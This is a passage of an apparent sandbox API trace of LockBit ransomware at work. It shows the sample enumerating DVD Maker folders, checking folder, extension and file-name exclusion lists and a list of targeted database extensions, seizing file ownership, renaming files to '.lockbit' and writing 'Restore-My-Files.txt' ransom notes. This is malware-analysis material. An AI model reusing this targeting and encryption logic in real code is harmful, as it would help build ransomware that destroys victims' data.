maker\\shared\\dvdstyles\\flippage\\pagecurl.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.472] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.472] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.472] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.472] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.472] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.472] RtlFreeAnsiString (AnsiString="\\") [0080.473] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0080.473] malloc (_Size=0x200) returned 0x77d800 [0080.473] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.473] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.473] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.473] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.473] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.473] CloseHandle (hObject=0x3c0) returned 1 [0080.474] free (_Block=0x77d800) [0080.474] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\pagecurl.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.474] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.474] malloc (_Size=0x40068) returned 0x3df0008 [0080.474] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24520) returned 1 [0080.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.474] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0080.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0080.475] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.480] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.480] malloc (_Size=0xaa) returned 0x1ff1e60 [0080.480] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0080.480] free (_Block=0x1ff1e60) [0080.480] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.480] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.480] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.480] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdf278c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdf278c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagecurl.png", cAlternateFileName="")) returned 0 [0080.481] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0080.481] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Full", cAlternateFileName="")) returned 1 [0080.481] lstrcmpiW (lpString1=".", lpString2="Full") returned -1 [0080.481] lstrcmpiW (lpString1="..", lpString2="Full") returned -1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="$windows.~bt") returned 1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="intel") returned -1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="msocache") returned -1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="$recycle.bin") returned 1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="$windows.~ws") returned 1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="tor browser") returned -1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="boot") returned 1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="system volume information") returned -1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="perflogs") returned -1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="google") returned -1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="application data") returned 1 [0080.481] lstrcmpiW (lpString1="Full", lpString2="windows") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="windows.old") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="appdata") returned 1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="Windows nt") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="Msbuild") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="Microsoft") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="All users") returned 1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="mozilla") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="Microsoft.NET") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="microsoft shared") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="Internet Explorer") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="common files") returned 1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="opera") returned -1 [0080.482] lstrcmpiW (lpString1="Full", lpString2="Windows Journal") returned -1 [0080.482] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 49 [0080.482] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*") returned 51 [0080.482] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0080.487] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0080.487] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.487] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0080.488] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0080.488] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f12724e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f12724e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0080.488] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0080.488] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0080.488] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0080.488] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.488] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.488] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.489] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.489] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.490] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.490] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0080.490] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0080.490] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0080.490] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0080.490] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0080.490] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0080.490] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0080.490] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.490] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png") returned=".png" [0080.490] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.490] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.490] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.490] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.491] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.491] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.491] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.491] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.491] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.492] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.492] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.492] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.492] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png.lockbit") returned 75 [0080.492] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.494] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.495] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.495] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.495] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.495] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.495] RtlFreeAnsiString (AnsiString="\\") [0080.495] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.495] malloc (_Size=0x200) returned 0x77d800 [0080.495] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.495] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.495] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.495] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.499] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.499] CloseHandle (hObject=0x3a0) returned 1 [0080.499] free (_Block=0x77d800) [0080.499] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.499] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.499] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.499] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4570) returned 1 [0080.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.500] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.503] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.503] malloc (_Size=0xac) returned 0x1ff1e60 [0080.503] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xac, FileInformationClass=0xa) returned 0x0 [0080.503] free (_Block=0x1ff1e60) [0080.503] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.503] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.503] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.504] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.504] malloc (_Size=0x40068) returned 0x1ff1e60 [0080.505] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.507] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f173508, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f173508, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0080.507] lstrcmpiW (lpString1=".", lpString2="15x15dot.png") returned -1 [0080.507] lstrcmpiW (lpString1="..", lpString2="15x15dot.png") returned -1 [0080.507] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0080.507] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.507] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.507] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.508] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.508] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.508] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.508] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.508] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.508] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.509] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.509] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.509] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.509] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.509] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.509] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="15x15dot.png") returned 1 [0080.509] lstrcmpiW (lpString1="ntldr", lpString2="15x15dot.png") returned 1 [0080.509] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="15x15dot.png") returned 1 [0080.509] lstrcmpiW (lpString1="bootsect.bak", lpString2="15x15dot.png") returned 1 [0080.509] lstrcmpiW (lpString1="autorun.inf", lpString2="15x15dot.png") returned 1 [0080.510] lstrcmpiW (lpString1="thumbs.db", 